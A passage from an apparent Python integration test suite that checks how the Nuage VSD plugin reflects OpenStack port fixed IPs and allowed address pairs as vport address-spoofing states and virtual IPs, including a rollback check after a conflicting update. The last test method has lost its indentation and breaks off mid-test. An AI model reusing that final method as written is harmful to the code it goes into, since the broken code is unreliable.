        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.ENABLED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = ['10.0.0.4']
        vip_mismatch = False
        mac_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
            if nuage_vport_vip['MAC'] != port['mac_address']:
                mac_mismatch = True
        self.assertEqual(vip_mismatch, False)
        self.assertEqual(mac_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_update_fixed_ips_same_subnet_l3_no_security(self):
        """Update a port (adding a fixed IP, clearing AAPs/SGs, disabling
        port security): spoofing flips from INHERITED to ENABLED."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.5',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.create_port(network=network,
                                fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        # update within subnet should succeed
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.update_port(port=port, fixed_ips=fixed_ips,
                                allowed_address_pairs=[],
                                security_groups=[],
                                port_security_enabled=False)
        self.assertIsNotNone(port, "Unable to update port")
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.ENABLED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = ['10.0.0.4']
        vip_mismatch = False
        mac_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
            if nuage_vport_vip['MAC'] != port['mac_address']:
                mac_mismatch = True
        self.assertEqual(vip_mismatch, False)
        self.assertEqual(mac_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_update_fixed_ips_same_subnet_l3(self):
        """Update a port to two fixed IPs within its L3 subnet: spoofing
        stays INHERITED; the first fixed IP shows up as a VSD VIP."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.create_port(network=network, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        # update within subnet should succeed
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.update_port(port=port, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to update port")
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = ['10.0.0.4']
        vip_mismatch = False
        mac_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
            if nuage_vport_vip['MAC'] != port['mac_address']:
                mac_mismatch = True
        self.assertEqual(vip_mismatch, False)
        self.assertEqual(mac_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_create_fixed_ips_same_subnet_l2_with_aap(self):
        """Create an L2 port with two fixed IPs plus an allowed-address
        pair: spoofing must be ENABLED on the VSD vport."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.50',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.create_port(network=network, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.L2_DOMAIN,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.L2_DOMAIN,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.ENABLED,
                         nuage_vport[0]['addressSpoofing'])
    @decorators.attr(type='smoke')
    def test_nuage_port_update_fixed_ips_same_subnet_l2_with_aap(self):
        """Update an L2 port with a second fixed IP and an allowed-address
        pair: spoofing flips from INHERITED to ENABLED."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.create_port(network=network, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.L2_DOMAIN,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.L2_DOMAIN,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        # update within subnet should succeed
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.50',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.update_port(port=port,
                                fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to update port")
        nuage_vport = self.vsd_client.get_vport(
            constants.L2_DOMAIN,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.ENABLED,
                         nuage_vport[0]['addressSpoofing'])
    @decorators.attr(type='smoke')
    def test_nuage_port_create_fixed_ips_same_subnet_l3_with_aap(self):
        """Create an L3 port with two fixed IPs plus an in-subnet AAP:
        spoofing stays INHERITED; both the extra fixed IP and the AAP
        address appear as VSD virtual IPs."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.6',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.create_port(network=network, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = ['10.0.0.4', allowed_address_pairs[0]['ip_address']]
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_create_fixed_ips_same_subnet_l3_with_aap_outside_cidr(
            self):
        """Create an L3 port with an AAP outside the subnet CIDR: spoofing
        must be ENABLED; only the extra fixed IP becomes a VSD VIP."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        # AAP address deliberately outside 10.0.0.0/24.
        allowed_address_pairs = [{'ip_address': '1.1.1.5',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.create_port(network=network, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.ENABLED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = ['10.0.0.4']
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_update_fixed_ips_same_subnet_l3_with_aap(self):
        """Update an L3 port with a second fixed IP and an in-subnet AAP:
        spoofing stays INHERITED; fixed IP and AAP appear as VSD VIPs."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.create_port(network=network, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        # update within subnet should succeed
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.6',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.update_port(port=port, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to update port")
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = ['10.0.0.4', allowed_address_pairs[0]['ip_address']]
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_update_fixed_ips_same_subnet_l3_with_aap_with_vm(self):
        """Like the AAP update test, but with a VM bound to the port before
        the update: VSD VIPs must follow the new fixed IPs and AAPs."""
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.10',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.create_port(network=network, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = [fixed_ips[0]["ip_address"],
                      allowed_address_pairs[0]['ip_address']]
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
        # Bind a VM to the port before updating it.
        self._create_server(name='vm-' + network['name'],
                            network=network, port_id=port['id'])
        # update within subnet should succeed
        fixed_ips = [
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.6",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.7',
                                  'mac_address': 'fe:a0:36:4b:c8:70'},
                                 {'ip_address': '10.0.0.10',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.update_port(port=port, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to update port")
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = [fixed_ips[0]["ip_address"],
                      allowed_address_pairs[0]['ip_address'],
                      allowed_address_pairs[1]['ip_address']]
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_update_app_to_fixed_ips_l3_with_vm(self):
        """Promote an AAP address to a fixed IP on a VM-bound L3 port:
        VSD VIPs must track the new fixed IP / AAP combination.

        NOTE(review): "app" in the method name presumably means "aap"
        (allowed address pair) -- kept as-is since renaming would change
        the test id.
        """
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.6',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.create_port(network=network, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = [fixed_ips[0]["ip_address"],
                      allowed_address_pairs[0]['ip_address']]
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
        # Bind a VM to the port before updating it.
        self._create_server(name='vm-' + network['name'],
                            network=network, port_id=port['id'])
        # update within subnet should succeed; 10.0.0.6 moves from AAP to
        # fixed IP.
        fixed_ips = [
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.6",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.7',
                                  'mac_address': 'fe:a0:36:4b:c8:70'},
                                 {'ip_address': '10.0.0.10',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.update_port(port=port, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to update port")
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = [fixed_ips[0]["ip_address"],
                      allowed_address_pairs[0]['ip_address'],
                      allowed_address_pairs[1]['ip_address']]
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_update_fixed_ip_with_vm_and_conflict_with_aap_neg(
            self):
        """Fixed-ip update conflicting with another port's AAP must fail.

        A port (two fixed ips + one allowed address pair) is created and a
        VM is booted on it.  A second port then claims 10.0.0.6 as an
        allowed address pair.  Updating the first port's fixed ips to
        include 10.0.0.6 must raise BadRequest, and the VSD vport must keep
        its original virtual ips and INHERITED address-spoofing state
        (i.e. proper rollback on the VSD side).
        """
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.10',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.create_port(network=network, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to create port on network")
        # VSD check: spoofing INHERITED, virtual ips = first fixed ip + AAP.
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = [fixed_ips[0]["ip_address"],
                      allowed_address_pairs[0]['ip_address']]
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
        self._create_server(name='vm-' + network['name'],
                            network=network, port_id=port['id'])
        # A second port claims 10.0.0.6 as an allowed address pair,
        # creating the conflict exercised below.
        fixed_ips = [
            {
                "ip_address": "10.0.0.8",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.6',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        self.create_port(network=network, fixed_ips=fixed_ips,
                         allowed_address_pairs=allowed_address_pairs)
        # Attempt to move the first port's fixed ips onto the conflicting
        # address 10.0.0.6.
        fixed_ips = [
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.6",
                "subnet_id": subnet["id"]
            }
        ]
        # below update will fail with proper roll back
        try:
            self.update_port(port=port, fixed_ips=fixed_ips)
            self.fail("Exception expected when updating to"
                      " a different subnet!")
        except exceptions.BadRequest as e:
            if ('Bad request: The IP Address 10.0.0.6 is'
                    ' currently in use by subnet' in e._error_string):
                # Rollback check: vport state must be unchanged.
                vsd_vport_parent = self.vsd_client.get_global_resource(
                    constants.SUBNETWORK,
                    filters='externalID',
                    filter_value=subnet['id'])[0]
                nuage_vport = self.vsd_client.get_vport(
                    constants.SUBNETWORK,
                    vsd_vport_parent['ID'],
                    filters='externalID',
                    filter_value=port['id'])
                self.assertEqual(constants.INHERITED,
                                 nuage_vport[0]['addressSpoofing'])
                nuage_vport_vips = self.vsd_client.get_virtual_ip(
                    constants.VPORT,
                    nuage_vport[0]['ID'])
                vip_mismatch = False
                if valid_vips and not nuage_vport_vips:
                    vip_mismatch = True
                for nuage_vport_vip in nuage_vport_vips:
                    if nuage_vport_vip['virtualIP'] not in valid_vips:
                        vip_mismatch = True
                self.assertEqual(vip_mismatch, False)
                pass
            else:
                # Differentiate between VSD failure and update failure
                LOG.debug(e._error_string)
                self.fail("A different NuageBadRequest exception"
                          " was expected for this operation.")
    @decorators.attr(type='smoke')
    def test_nuage_port_create_fixed_ip_same_as_aap(self):
        """Create a port whose AAP equals one of its own fixed ips.

        When the allowed address pair duplicates a fixed ip of the same
        port, the VSD vport must report address spoofing ENABLED and every
        virtual ip on the vport must carry the port's own MAC address.
        """
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        # 10.0.0.6 appears both as a fixed ip and as the AAP ip.
        fixed_ips = [
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.6",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.6',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.create_port(network=network, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.ENABLED,
                         nuage_vport[0]['addressSpoofing'])
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = [fixed_ips[0]["ip_address"],
                      allowed_address_pairs[0]['ip_address']]
        # Verify every virtual ip is expected and carries the port's MAC.
        vip_mismatch = False
        mac_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
            if nuage_vport_vip['MAC'] != port['mac_address']:
                mac_mismatch = True
        self.assertEqual(vip_mismatch, False)
        self.assertEqual(mac_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ips_same_as_aap(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.6',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address']]
